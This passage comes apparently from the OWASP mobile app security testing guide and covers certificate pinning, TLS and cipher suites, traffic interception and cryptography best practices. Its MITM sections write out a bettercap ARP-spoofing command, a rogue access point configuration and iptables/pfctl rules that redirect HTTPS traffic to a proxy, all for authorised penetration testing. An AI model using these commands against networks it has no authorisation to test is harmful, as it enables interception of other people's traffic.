For many apps, the \"default behavior\" provided by the mobile platform will be secure enough for their use case (in the rare case that a system-trusted CA is compromised the data handled by the app is not considered sensitive or other security measures are taken which are resilient even to such a CA breach). However, for other apps such as financial or health apps, the risk of a CA breach, even if rare, must be considered.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#restricting-trust-identity-pinning","title":"Restricting Trust: Identity Pinning","text":"Some apps might need to further increase their security by restricting the number of CAs that they trust. Typically only the CAs which are used by the developer are explicitly trusted, while disregarding all others. This trust restriction is known as Identity Pinning usually implemented as Certificate Pinning or Public Key Pinning.
In the OWASP MASTG we will be referring to this term as \"Identity Pinning\", \"Certificate Pinning\", \"Public Key Pinning\" or simply \"Pinning\".
Pinning is the process of associating a remote endpoint with a particular identity, such as a X.509 certificate or public key, instead of accepting any certificate signed by a trusted CA. After pinning the server identity (or a certain set, aka. pinset), the mobile app will subsequently connect to those remote endpoints only if the identity matches. Withdrawing trust from unnecessary CAs reduces the app's attack surface.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#general-guidelines","title":"General Guidelines","text":"The OWASP Certificate Pinning Cheat Sheet gives essential guidance on:
Both Android and iOS recommendations match the \"best case\" which is:
subjectPublicKeyInfo
.Pinning has gained a bad reputation since its introduction several years ago. We'd like to clarify a couple of points that are valid at least for mobile application security:
The Android Developers site includes the following warning:
Caution: Certificate Pinning is not recommended for Android applications due to the high risk of future server configuration changes, such as changing to another Certificate Authority, rendering the application unable to connect to the server without receiving a client software update.
They also include this note:
Note that, when using certificate pinning, you should always include a backup key so that if you are forced to switch to new keys or change CAs (when pinning to a CA certificate or an intermediate of that CA), your app's connectivity is unaffected. Otherwise, you must push out an update to the app to restore connectivity.
The first statement can be mistakenly interpreted as saying that they \"do not recommend certificate pinning\". The second statement clarifies this: the actual recommendation is that if developers want to implement pinning they have to take the necessary precautions.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#about-pinning-recommendations-in-apple-developers","title":"About Pinning Recommendations in Apple Developers","text":"Apple recommends thinking long-term and creating a proper server authentication strategy.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#owasp-mastg-recommendation","title":"OWASP MASTG Recommendation","text":"Pinning is a recommended practice, especially for MASVS-L2 apps. However, developers must implement it exclusively for the endpoints under their control and be sure to include backup keys (aka. backup pins) and have a proper app update strategy.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#learn-more","title":"Learn more","text":"One of the core mobile app functions is sending/receiving data over untrusted networks like the Internet. If the data is not properly protected in transit, an attacker with access to any part of the network infrastructure (e.g., a Wi-Fi access point) may intercept, read, or modify it. This is why plaintext network protocols are rarely advisable.
The vast majority of apps rely on HTTP for communication with the backend. HTTPS wraps HTTP in an encrypted connection (the acronym HTTPS originally referred to HTTP over Secure Socket Layer (SSL); SSL is the deprecated predecessor of TLS). TLS allows authentication of the backend service and ensures confidentiality and integrity of the network data.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#recommended-tls-settings","title":"Recommended TLS Settings","text":"Ensuring proper TLS configuration on the server side is also important. The SSL protocol is deprecated and should no longer be used. Also TLS v1.0 and TLS v1.1 have known vulnerabilities and their usage is deprecated in all major browsers by 2020. TLS v1.2 and TLS v1.3 are considered best practice for secure transmission of data. Starting with Android 10 (API level 29) TLS v1.3 will be enabled by default for faster and secure communication. The major change with TLS v1.3 is that customizing cipher suites is no longer possible and that all of them are enabled when TLS v1.3 is enabled, whereas Zero Round Trip (0-RTT) mode isn't supported.
When both the client and server are controlled by the same organization and used only for communicating with one another, you can increase security by hardening the configuration.
If a mobile application connects to a specific server, its networking stack can be tuned to ensure the highest possible security level for the server's configuration. Lack of support in the underlying operating system may force the mobile application to use a weaker configuration.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#cipher-suites-terminology","title":"Cipher Suites Terminology","text":"Cipher suites have the following structure:
Protocol_KeyExchangeAlgorithm_WITH_BlockCipher_IntegrityCheckAlgorithm\n
This structure includes:
Example: TLS_RSA_WITH_3DES_EDE_CBC_SHA
In the example above the cipher suites uses:
Note that in TLSv1.3 the Key Exchange Algorithm is not part of the cipher suite, instead it is determined during the TLS handshake.
In the following listing, we\u2019ll present the different algorithms of each part of the cipher suite.
Protocols:
SSLv1
SSLv2
- RFC 6176SSLv3
- RFC 6101TLSv1.0
- RFC 2246TLSv1.1
- RFC 4346TLSv1.2
- RFC 5246TLSv1.3
- RFC 8446Key Exchange Algorithms:
DSA
- RFC 6979ECDSA
- RFC 6979RSA
- RFC 8017DHE
- RFC 2631 - RFC 7919ECDHE
- RFC 4492PSK
- RFC 4279DSS
- FIPS186-4DH_anon
- RFC 2631 - RFC 7919DHE_RSA
- RFC 2631 - RFC 7919DHE_DSS
- RFC 2631 - RFC 7919ECDHE_ECDSA
- RFC 8422ECDHE_PSK
- RFC 8422 - RFC 5489ECDHE_RSA
- RFC 8422Block Ciphers:
DES
- RFC 4772DES_CBC
- RFC 18293DES
- RFC 24203DES_EDE_CBC
- RFC 2420AES_128_CBC
- RFC 3268AES_128_GCM
- RFC 5288AES_256_CBC
- RFC 3268AES_256_GCM
- RFC 5288RC4_40
- RFC 7465RC4_128
- RFC 7465CHACHA20_POLY1305
- RFC 7905 - RFC 7539Integrity Check Algorithms:
MD5
- RFC 6151SHA
- RFC 6234SHA256
- RFC 6234SHA384
- RFC 6234Note that the efficiency of a cipher suite depends on the efficiency of its algorithms.
The following resources contain the latest recommended cipher suites to use with TLS:
Some Android and iOS versions do not support some of the recommended cipher suites, so for compatibility purposes you can check the supported cipher suites for Android and iOS versions and choose the top supported cipher suites.
If you want to verify whether your server supports the right cipher suites, there are various tools you can use:
Finally, verify that the server or termination proxy at which the HTTPS connection terminates is configured according to best practices. See also the OWASP Transport Layer Protection cheat sheet and the Qualys SSL/TLS Deployment Best Practices.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#intercepting-https-traffic","title":"Intercepting HTTP(S) Traffic","text":"In many cases, it is most practical to configure a system proxy on the mobile device, so that HTTP(S) traffic is redirected through an interception proxy running on your host computer. By monitoring the requests between the mobile app client and the backend, you can easily map the available server-side APIs and gain insight into the communication protocol. Additionally, you can replay and manipulate requests to test for server-side vulnerabilities.
Several free and commercial proxy tools are available. Here are some of the most popular:
To use the interception proxy, you'll need to run it on your host computer and configure the mobile app to route HTTP(S) requests to your proxy. In most cases, it is enough to set a system-wide proxy in the network settings of the mobile device - if the app uses standard HTTP APIs or popular libraries such as okhttp
, it will automatically use the system settings.
Using a proxy breaks SSL certificate verification and the app will usually fail to initiate TLS connections. To work around this issue, you can install your proxy's CA certificate on the device. We'll explain how to do this in the OS-specific \"Basic Security Testing\" chapters.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#intercepting-non-http-traffic","title":"Intercepting Non-HTTP Traffic","text":"Interception proxies such as Burp and OWASP ZAP won't show non-HTTP traffic, because they aren't capable of decoding it properly by default. There are, however, Burp plugins available such as:
These plugins can visualize non-HTTP protocols and you will also be able to intercept and manipulate the traffic.
Note that this setup can sometimes become very tedious and is not as straightforward as testing HTTP.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#intercepting-traffic-from-the-app-process","title":"Intercepting Traffic from the App Process","text":"Depending on your goal while testing the app, sometimes it is enough to monitor the traffic before it reaches the network layer or when the responses are received in the app.
You don't need to deploy a fully fledged MITM attack if you simply want to know if a certain piece of sensitive data is being transmitted to the network. In this case you wouldn't even have to bypass pinning, if implemented. You just have to hook the right functions, e.g. SSL_write
and SSL_read
from openssl.
This would work pretty well for apps using standard API libraries functions and classes, however there might be some downsides:
See some examples:
This technique is also useful for other types of traffic such as BLE, NFC, etc. where deploying a MITM attack might be very costly and or complex.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#intercepting-traffic-on-the-network-layer","title":"Intercepting Traffic on the Network Layer","text":"Dynamic analysis by using an interception proxy can be straight forward if standard libraries are used in the app and all communication is done via HTTP. But there are several cases where this is not working:
In these cases you need to monitor and analyze the network traffic first in order to decide what to do next. Luckily, there are several options for redirecting and intercepting network communication:
To be able to get a man-in-the-middle position your host computer should be in the same wireless network as the mobile phone and the gateway it communicates to. Once this is done you need the IP address of your mobile phone. For a full dynamic analysis of a mobile app, all network traffic should be intercepted.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#mitm-attack","title":"MITM Attack","text":"Start your preferred network analyzer tool first, then start bettercap with the following command and replace the IP address below (X.X.X.X) with the target you want to execute the MITM attack against.
$ sudo bettercap -eval \"set arp.spoof.targets X.X.X.X; arp.spoof on; set arp.spoof.internal true; set arp.spoof.fullduplex true;\"\nbettercap v2.22 (built for darwin amd64 with go1.12.1) [type 'help' for a list of commands]\n\n[19:21:39] [sys.log] [inf] arp.spoof enabling forwarding\n[19:21:39] [sys.log] [inf] arp.spoof arp spoofer started, probing 1 targets.\n
bettercap will then automatically send the packets to the network gateway in the (wireless) network and you are able to sniff the traffic. Beginning of 2019 support for full duplex ARP spoofing was added to bettercap.
On the mobile phone start the browser and navigate to http://example.com
, you should see output like the following when you are using Wireshark.
If that's the case, you are now able to see the complete network traffic that is sent and received by the mobile phone. This includes also DNS, DHCP and any other form of communication and can therefore be quite \"noisy\". You should therefore know how to use DisplayFilters in Wireshark or know how to filter in tcpdump to focus only on the relevant traffic for you.
Man-in-the-middle attacks work against any device and operating system as the attack is executed on OSI Layer 2 through ARP Spoofing. When you are MITM you might not be able to see clear text data, as the data in transit might be encrypted by using TLS, but it will give you valuable information about the hosts involved, the protocols used and the ports the app is communicating with.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#simulating-a-man-in-the-middle-attack-with-an-access-point","title":"Simulating a Man-in-the-Middle Attack with an access point","text":""},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#network-setup_1","title":"Network Setup","text":"A simple way to simulate a man-in-the-middle (MITM) attack is to configure a network where all packets between the devices in scope and the target network are going through your host computer. In a mobile penetration test, this can be achieved by using an access point the mobile devices and your host computer are connected to. Your host computer is then becoming a router and an access point.
Following scenarios are possible:
The scenario with an external USB WiFi card require that the card has the capability to create an access point. Additionally, you need to install some tools and/or configure the network to enforce a man-in-the-middle position (see below). You can verify if your WiFi card has AP capabilities by using the command iwconfig
on Kali Linux:
iw list | grep AP\n
The scenario with a separate access point requires access to the configuration of the AP and you should check first if the AP supports either:
In both cases the AP needs to be configured to point to your host computer's IP. Your host computer must be connected to the AP (via wired connection or WiFi) and you need to have connection to the target network (can be the same connection as to the AP). Some additional configuration may be required on your host computer to route traffic to the target network.
If the separate access point belongs to the customer, all changes and configurations should be clarified prior to the engagement and a backup should be created, before making any changes.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#installation","title":"Installation","text":"The following procedure is setting up a man-in-the-middle position using an access point and an additional network interface:
Create a WiFi network either through a separate access point or through an external USB WiFi card or through the built-in card of your host computer.
This can be done by using the built-in utilities on macOS. You can use share the internet connection on Mac with other network users.
For all major Linux and Unix operating systems you need tools such as:
For Kali Linux you can install these tools with apt-get
:
apt-get update\napt-get install hostapd dnsmasq aircrack-ng\n
iptables and wpa_supplicant are installed by default on Kali Linux.
In case of a separate access point, route the traffic to your host computer. In case of an external USB WiFi card or built-in WiFi card the traffic is already available on your host computer.
Route the incoming traffic coming from the WiFi to the additional network interface where the traffic can reach the target network. Additional network interface can be wired connection or other WiFi card, depending on your setup.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#configuration","title":"Configuration","text":"We focus on the configuration files for Kali Linux. Following values need to be defined:
The following configuration files need to be changed and adjusted accordingly:
hostapd.conf
# Name of the WiFi interface we use\ninterface=wlan1\n# Use the nl80211 driver\ndriver=nl80211\nhw_mode=g\nchannel=6\nwmm_enabled=1\nmacaddr_acl=0\nauth_algs=1\nignore_broadcast_ssid=0\nwpa=2\nwpa_key_mgmt=WPA-PSK\nrsn_pairwise=CCMP\n# Name of the AP network\nssid=STM-AP\n# Password of the AP network\nwpa_passphrase=password\n
wpa_supplicant.conf
network={\n ssid=\"NAME_OF_THE_TARGET_NETWORK\"\n psk=\"PASSWORD_OF_THE_TARGET_NETWORK\"\n}\n
dnsmasq.conf
interface=wlan1\ndhcp-range=10.0.0.10,10.0.0.250,12h\ndhcp-option=3,10.0.0.1\ndhcp-option=6,10.0.0.1\nserver=8.8.8.8\nlog-queries\nlog-dhcp\nlisten-address=127.0.0.1\n
To be able to get a man-in-the-middle position you need to run the above configuration. This can be done by using the following commands on Kali Linux:
# check if other process is not using WiFi interfaces\n$ airmon-ng check kill\n# configure IP address of the AP network interface\n$ ifconfig wlan1 10.0.0.1 up\n# start access point\n$ hostapd hostapd.conf\n# connect the target network interface\n$ wpa_supplicant -B -i wlan0 -c wpa_supplicant.conf\n# run DNS server\n$ dnsmasq -C dnsmasq.conf -d\n# enable routing\n$ echo 1 > /proc/sys/net/ipv4/ip_forward\n# iptables will NAT connections from AP network interface to the target network interface\n$ iptables --flush\n$ iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE\n$ iptables --append FORWARD --in-interface wlan1 -j ACCEPT\n$ iptables -t nat -A POSTROUTING -j MASQUERADE\n
Now you can connect your mobile devices to the access point.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#network-analyzer-tool","title":"Network Analyzer Tool","text":"Install a tool that allows you to monitor and analyze the network traffic that will be redirected to your host computer. The two most common network monitoring (or capturing) tools are:
Wireshark offers a GUI and is more straightforward if you are not used to the command line. If you are looking for a command line tool you should either use TShark or tcpdump. All of these tools are available for all major Linux and Unix operating systems and should be part of their respective package installation mechanisms.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#setting-a-proxy-through-runtime-instrumentation","title":"Setting a Proxy Through Runtime Instrumentation","text":"On a rooted or jailbroken device, you can also use runtime hooking to set a new proxy or redirect network traffic. This can be achieved with hooking tools like Inspeckage or code injection frameworks like Frida and cycript. You'll find more information about runtime instrumentation in the \"Reverse Engineering and Tampering\" chapters of this guide.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#example-dealing-with-xamarin","title":"Example - Dealing with Xamarin","text":"As an example, we will now redirect all requests from a Xamarin app to an interception proxy.
Xamarin is a mobile application development platform that is capable of producing native Android and iOS apps by using Visual Studio and C# as programming language.
When testing a Xamarin app and when you are trying to set the system proxy in the Wi-Fi settings you won't be able to see any HTTP requests in your interception proxy, as the apps created by Xamarin do not use the local proxy settings of your phone. There are three ways to resolve this:
1st way: Add a default proxy to the app, by adding the following code in the OnCreate
or Main
method and re-create the app:
WebRequest.DefaultWebProxy = new WebProxy(\"192.168.11.1\", 8080);\n
2nd way: Use bettercap in order to get a man-in-the-middle position (MITM), see the section above about how to setup a MITM attack. When being MITM you only need to redirect port 443 to your interception proxy running on localhost. This can be done by using the command rdr
on macOS:
$ echo \"\nrdr pass inet proto tcp from any to any port 443 -> 127.0.0.1 port 8080\n\" | sudo pfctl -ef -\n
For Linux systems you can use iptables
:
sudo iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 127.0.0.1:8080\n
As last step, you need to set the option 'Support invisible proxy' in the listener settings of Burp Suite.
3rd way: Instead of bettercap an alternative is tweaking the /etc/hosts
on the mobile phone. Add an entry into /etc/hosts
for the target domain and point it to the IP address of your intercepting proxy. This creates a similar situation of being MITM as with bettercap and you need to redirect port 443 to the port which is used by your interception proxy. The redirection can be applied as mentioned above. Additionally, you need to redirect traffic from your interception proxy to the original location and port.
When redirecting traffic you should create narrow rules to the domains and IPs in scope, to minimize noise and out-of-scope traffic.
The interception proxy need to listen to the port specified in the port forwarding rule above, which is 8080.
When a Xamarin app is configured to use a proxy (e.g. by using WebRequest.DefaultWebProxy
) you need to specify where traffic should go next, after redirecting the traffic to your intercepting proxy. You need to redirect the traffic to the original location. The following procedure is setting up a redirection in Burp to the original location:
Go to Request handling tab and set:
If not already done, install the CA certificates in your mobile device which will allow us to intercept HTTPS requests:
Start using the app and trigger its functions. You should see HTTP messages showing up in your interception proxy.
When using bettercap you need to activate \"Support invisible proxying\" in Proxy Tab / Options / Edit Interface
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/","title":"Mobile App Cryptography","text":"Cryptography plays an especially important role in securing the user's data - even more so in a mobile environment, where attackers having physical access to the user's device is a likely scenario. This chapter provides an outline of cryptographic concepts and best practices relevant to mobile apps. These best practices are valid independent of the mobile operating system.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#key-concepts","title":"Key Concepts","text":"The goal of cryptography is to provide constant confidentiality, data integrity, and authenticity, even in the face of an attack. Confidentiality involves ensuring data privacy through the use of encryption. Data integrity deals with data consistency and detection of tampering and modification of data through the use of hashing. Authenticity ensures that the data comes from a trusted source.
Encryption algorithms converts plaintext data into cipher text that conceals the original content. Plaintext data can be restored from the cipher text through decryption. Encryption can be symmetric (encryption/decryption with same secret-key) or asymmetric (encryption/decryption using a public and private key pair). In general, encryption operations do not protect integrity, but some symmetric encryption modes also feature that protection.
Symmetric-key encryption algorithms use the same key for both encryption and decryption. This type of encryption is fast and suitable for bulk data processing. Since everybody who has access to the key is able to decrypt the encrypted content, this method requires careful key management and centralized control over key distribution.
Public-key encryption algorithms operate with two separate keys: the public key and the private key. The public key can be distributed freely while the private key shouldn't be shared with anyone. A message encrypted with the public key can only be decrypted with the private key and vice-versa. Since asymmetric encryption is several times slower than symmetric operations, it's typically only used to encrypt small amounts of data, such as symmetric keys for bulk encryption.
Hashing isn't a form of encryption, but it does use cryptography. Hash functions deterministically map arbitrary pieces of data into fixed-length values. It's easy to compute the hash from the input, but very difficult (i.e. infeasible) to determine the original input from the hash. Additionally, the hash will completely change when even a single bit of the input changes. Hash functions are used for integrity verification, but don't provide an authenticity guarantee.
Message Authentication Codes (MACs) combine other cryptographic mechanisms (such as symmetric encryption or hashes) with secret keys to provide both integrity and authenticity protection. However, in order to verify a MAC, multiple entities have to share the same secret key and any of those entities can generate a valid MAC. HMACs, the most commonly used type of MAC, rely on hashing as the underlying cryptographic primitive. The full name of an HMAC algorithm usually includes the underlying hash function's type (for example, HMAC-SHA256 uses the SHA-256 hash function).
Signatures combine asymmetric cryptography (that is, using a public/private key pair) with hashing to provide integrity and authenticity by encrypting the hash of the message with the private key. However, unlike MACs, signatures also provide non-repudiation property as the private key should remain unique to the data signer.
Key Derivation Functions (KDFs) derive secret keys from a secret value (such as a password) and are used to turn keys into other formats or to increase their length. KDFs are similar to hashing functions but have other uses as well (for example, they are used as components of multi-party key-agreement protocols). While both hashing functions and KDFs must be difficult to reverse, KDFs have the added requirement that the keys they produce must have a level of randomness.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#identifying-insecure-andor-deprecated-cryptographic-algorithms","title":"Identifying Insecure and/or Deprecated Cryptographic Algorithms","text":"When assessing a mobile app, you should make sure that it does not use cryptographic algorithms and protocols that have significant known weaknesses or are otherwise insufficient for modern security requirements. Algorithms that were considered secure in the past may become insecure over time; therefore, it's important to periodically check current best practices and adjust configurations accordingly.
Verify that cryptographic algorithms are up to date and in-line with industry standards. Vulnerable algorithms include outdated block ciphers (such as DES and 3DES), stream ciphers (such as RC4), hash functions (such as MD5 and SHA1), and broken random number generators (such as Dual_EC_DRBG and SHA1PRNG). Note that even algorithms that are certified (for example, by NIST) can become insecure over time. A certification does not replace periodic verification of an algorithm's soundness. Algorithms with known weaknesses should be replaced with more secure alternatives. Additionally, algorithms used for encryption must be standardized and open to verification. Encrypting data using any unknown, or proprietary algorithms may expose the application to different cryptographic attacks which may result in recovery of the plaintext.
Inspect the app's source code to identify instances of cryptographic algorithms that are known to be weak, such as:
The names of cryptographic APIs depend on the particular mobile platform.
Please make sure that:
The following algorithms are recommended:
Additionally, you should always rely on secure hardware (if available) for storing encryption keys, performing cryptographic operations, etc.
For more information on algorithm choice and best practices, see the following resources:
Even the most secure encryption algorithm becomes vulnerable to brute-force attacks when that algorithm uses an insufficient key size.
Ensure that the key length fulfills accepted industry standards.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#symmetric-encryption-with-hard-coded-cryptographic-keys","title":"Symmetric Encryption with Hard-Coded Cryptographic Keys","text":"The security of symmetric encryption and keyed hashes (MACs) depends on the secrecy of the key. If the key is disclosed, the security gained by encryption is lost. To prevent this, never store secret keys in the same place as the encrypted data they helped create. A common mistake is encrypting locally stored data with a static, hardcoded encryption key and compiling that key into the app. This makes the key accessible to anyone who can use a disassembler.
Hardcoded encryption key means that a key is:
First, ensure that no keys or passwords are stored within the source code. This means you should check native code, JavaScript/Dart code, Java/Kotlin code on Android and Objective-C/Swift in iOS. Note that hard-coded keys are problematic even if the source code is obfuscated since obfuscation is easily bypassed by dynamic instrumentation.
If the app is using two-way TLS (both server and client certificates are validated), make sure that:
If the app relies on an additional encrypted container stored in app data, check how the encryption key is used. If a key-wrapping scheme is used, ensure that the master secret is initialized for each user or the container is re-encrypted with new key. If you can use the master secret or previous password to decrypt the container, check how password changes are handled.
Secret keys must be stored in secure device storage whenever symmetric cryptography is used in mobile apps. For more information on the platform-specific APIs, see the \"Data Storage on Android\" and \"Data Storage on iOS\" chapters.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#weak-key-generation-functions","title":"Weak Key Generation Functions","text":"Cryptographic algorithms (such as symmetric encryption or some MACs) expect a secret input of a given size. For example, AES uses a key of exactly 16 bytes. A native implementation might use the user-supplied password directly as an input key. Using a user-supplied password as an input key has the following problems:
Ensure that passwords aren't directly passed into an encryption function. Instead, the user-supplied password should be passed into a KDF to create a cryptographic key. Choose an appropriate iteration count when using password derivation functions. For example, NIST recommends an iteration count of at least 10,000 for PBKDF2 and for critical keys where user-perceived performance is not critical at least 10,000,000. For critical keys, it is recommended to consider implementation of algorithms recognized by Password Hashing Competition (PHC) like Argon2.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#weak-random-number-generators","title":"Weak Random Number Generators","text":"It is fundamentally impossible to produce truly random numbers on any deterministic device. Pseudo-random number generators (RNG) compensate for this by producing a stream of pseudo-random numbers - a stream of numbers that appear as if they were randomly generated. The quality of the generated numbers varies with the type of algorithm used. Cryptographically secure RNGs generate random numbers that pass statistical randomness tests, and are resilient against prediction attacks (e.g. it is statistically infeasible to predict the next number produced).
Mobile SDKs offer standard implementations of RNG algorithms that produce numbers with sufficient artificial randomness. We'll introduce the available APIs in the Android and iOS specific sections.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#custom-implementations-of-cryptography","title":"Custom Implementations of Cryptography","text":"Inventing proprietary cryptographic functions is time consuming, difficult, and likely to fail. Instead, we can use well-known algorithms that are widely regarded as secure. Mobile operating systems offer standard cryptographic APIs that implement those algorithms.
Carefully inspect all the cryptographic methods used within the source code, especially those that are directly applied to sensitive data. All cryptographic operations should use standard cryptographic APIs for Android and iOS (we'll write about those in more detail in the platform-specific chapters). Any cryptographic operations that don't invoke standard routines from known providers should be closely inspected. Pay close attention to standard algorithms that have been modified. Remember that encoding isn't the same as encryption! Always investigate further when you find bit manipulation operators like XOR (exclusive OR).
At all implementations of cryptography, you need to ensure that the following always takes place:
Advanced Encryption Standard (AES) is the widely accepted standard for symmetric encryption in mobile apps. It's an iterative block cipher that is based on a series of linked mathematical operations. AES performs a variable number of rounds on the input, each of which involve substitution and permutation of the bytes in the input block. Each round uses a 128-bit round key which is derived from the original AES key.
As of this writing, no efficient cryptanalytic attacks against AES have been discovered. However, implementation details and configurable parameters such as the block cipher mode leave some margin for error.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#weak-block-cipher-mode","title":"Weak Block Cipher Mode","text":"Block-based encryption is performed upon discrete input blocks (for example, AES has 128-bit blocks). If the plaintext is larger than the block size, the plaintext is internally split up into blocks of the given input size and encryption is performed on each block. A block cipher mode of operation (or block mode) determines if the result of encrypting the previous block impacts subsequent blocks.
ECB (Electronic Codebook) divides the input into fixed-size blocks that are encrypted separately using the same key. If multiple divided blocks contain the same plaintext, they will be encrypted into identical ciphertext blocks which makes patterns in data easier to identify. In some situations, an attacker might also be able to replay the encrypted data.
Verify that Cipher Block Chaining (CBC) mode is used instead of ECB. In CBC mode, plaintext blocks are XORed with the previous ciphertext block. This ensures that each encrypted block is unique and randomized even if blocks contain the same information. Please note that it is best to combine CBC with an HMAC and/or ensure that no errors are given such as \"Padding error\", \"MAC error\", \"decryption failed\" in order to be more resistant to a padding oracle attack.
When storing encrypted data, we recommend using a block mode that also protects the integrity of the stored data, such as Galois/Counter Mode (GCM). The latter has the additional benefit that the algorithm is mandatory for each TLSv1.2 implementation, and thus is available on all modern platforms.
For more information on effective block modes, see the NIST guidelines on block mode selection.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#predictable-initialization-vector","title":"Predictable Initialization Vector","text":"CBC, OFB, CFB, PCBC, GCM mode require an initialization vector (IV) as an initial input to the cipher. The IV doesn't have to be kept secret, but it shouldn't be predictable: it should be random and unique/non-repeatable for each encrypted message. Make sure that IVs are generated using a cryptographically secure random number generator. For more information on IVs, see Crypto Fail's initialization vectors article.
Pay attention to cryptographic libraries used in the code: many open source libraries provide examples in their documentations that might follow bad practices (e.g. using a hardcoded IV). A popular mistake is copy-pasting example code without changing the IV value.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#initialization-vectors-in-stateful-operation-modes","title":"Initialization Vectors in stateful operation modes","text":"Please note that the usage of IVs is different when using CTR and GCM mode in which the initialization vector is often a counter (in CTR combined with a nonce). So here using a predictable IV with its own stateful model is exactly what is needed. In CTR you have a new nonce plus counter as an input to every new block operation. For example: for a 5120 bit long plaintext: you have 20 blocks, so you need 20 input vectors consisting of a nonce and counter. Whereas in GCM you have a single IV per cryptographic operation, which should not be repeated with the same key. See section 8 of the documentation from NIST on GCM for more details and recommendations of the IV.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#padding-oracle-attacks-due-to-weaker-padding-or-block-operation-implementations","title":"Padding Oracle Attacks due to Weaker Padding or Block Operation Implementations","text":"In the old days, PKCS1.5 padding (in code: PKCS1Padding
) was used as a padding mechanism when doing asymmetric encryption. This mechanism is vulnerable to the padding oracle attack. Therefore, it is best to use OAEP (Optimal Asymmetric Encryption Padding) captured in PKCS#1 v2.0 (in code: OAEPPadding
, OAEPwithSHA-256andMGF1Padding
, OAEPwithSHA-224andMGF1Padding
, OAEPwithSHA-384andMGF1Padding
, OAEPwithSHA-512andMGF1Padding
). Note that, even when using OAEP, you can still run into an issue known best as the Manger's attack as described in the blog at Kudelskisecurity.
Note: AES-CBC with PKCS #5 has shown to be vulnerable to padding oracle attacks as well, given that the implementation gives warnings, such as \"Padding error\", \"MAC error\", or \"decryption failed\". See The Padding Oracle Attack and The CBC Padding Oracle Problem for an example. Next, it is best to ensure that you add an HMAC after you encrypt the plaintext: after all a ciphertext with a failing MAC will not have to be decrypted and can be discarded.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#protecting-keys-in-storage-and-in-memory","title":"Protecting Keys in Storage and in Memory","text":"When memory dumping is part of your threat model, then keys can be accessed the moment they are actively used. Memory dumping either requires root-access (e.g. a rooted device or jailbroken device) or it requires a patched application with Frida (so you can use tools like Fridump). Therefore it is best to consider the following, if keys are still needed at the device:
Note: given the ease of memory dumping, never share the same key among accounts and/or devices, other than public keys used for signature verification or encryption.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#protecting-keys-in-transport","title":"Protecting Keys in Transport","text":"When keys need to be transported from one device to another, or from the app to a backend, make sure that proper key protection is in place, by means of a transport keypair or another mechanism. Often, keys are shared with obfuscation methods which can be easily reversed. Instead, make sure asymmetric cryptography or wrapping keys are used. For example, a symmetric key can be encrypted with the public key from an asymmetric key pair.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#cryptographic-apis-on-android-and-ios","title":"Cryptographic APIs on Android and iOS","text":"While same basic cryptographic principles apply independent of the particular OS, each operating system offers its own implementation and APIs. Platform-specific cryptographic APIs for data storage are covered in greater detail in the \"Data Storage on Android\" and \"Testing Data Storage on iOS\" chapters. Encryption of network traffic, especially Transport Layer Security (TLS), is covered in the \"Android Network APIs\" chapter.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#cryptographic-policy","title":"Cryptographic Policy","text":"In larger organizations, or when high-risk applications are created, it can often be a good practice to have a cryptographic policy, based on frameworks such as NIST Recommendation for Key Management. When basic errors are found in the application of cryptography, it can be a good starting point of setting up a lessons learned / cryptographic key management policy.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#cryptography-regulations","title":"Cryptography Regulations","text":"When you upload the app to the App Store or Google Play, your application is typically stored on a US server. If your app contains cryptography and is distributed to any other country, it is considered a cryptography export. It means that you need to follow US export regulations for cryptography. Also, some countries have import regulations for cryptography.
Learn more:
Mobile app developers use a wide variety of programming languages and frameworks. As such, common vulnerabilities such as SQL injection, buffer overflows, and cross-site scripting (XSS), may manifest in apps when neglecting secure programming practices.
The same programming flaws may affect both Android and iOS apps to some degree, so we'll provide an overview of the most common vulnerability classes frequently in the general section of the guide. In later sections, we will cover OS-specific instances and exploit mitigation features.
"},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#injection-flaws","title":"Injection Flaws","text":"An injection flaw describes a class of security vulnerability occurring when user input is inserted into backend queries or commands. By injecting meta-characters, an attacker can execute malicious code that is inadvertently interpreted as part of the command or query. For example, by manipulating a SQL query, an attacker could retrieve arbitrary database records or manipulate the content of the backend database.
Vulnerabilities of this class are most prevalent in server-side web services. Exploitable instances also exist within mobile apps, but occurrences are less common, plus the attack surface is smaller.
For example, while an app might query a local SQLite database, such databases usually do not store sensitive data (assuming the developer followed basic security practices). This makes SQL injection a non-viable attack vector. Nevertheless, exploitable injection vulnerabilities sometimes occur, meaning proper input validation is a necessary best practice for programmers.
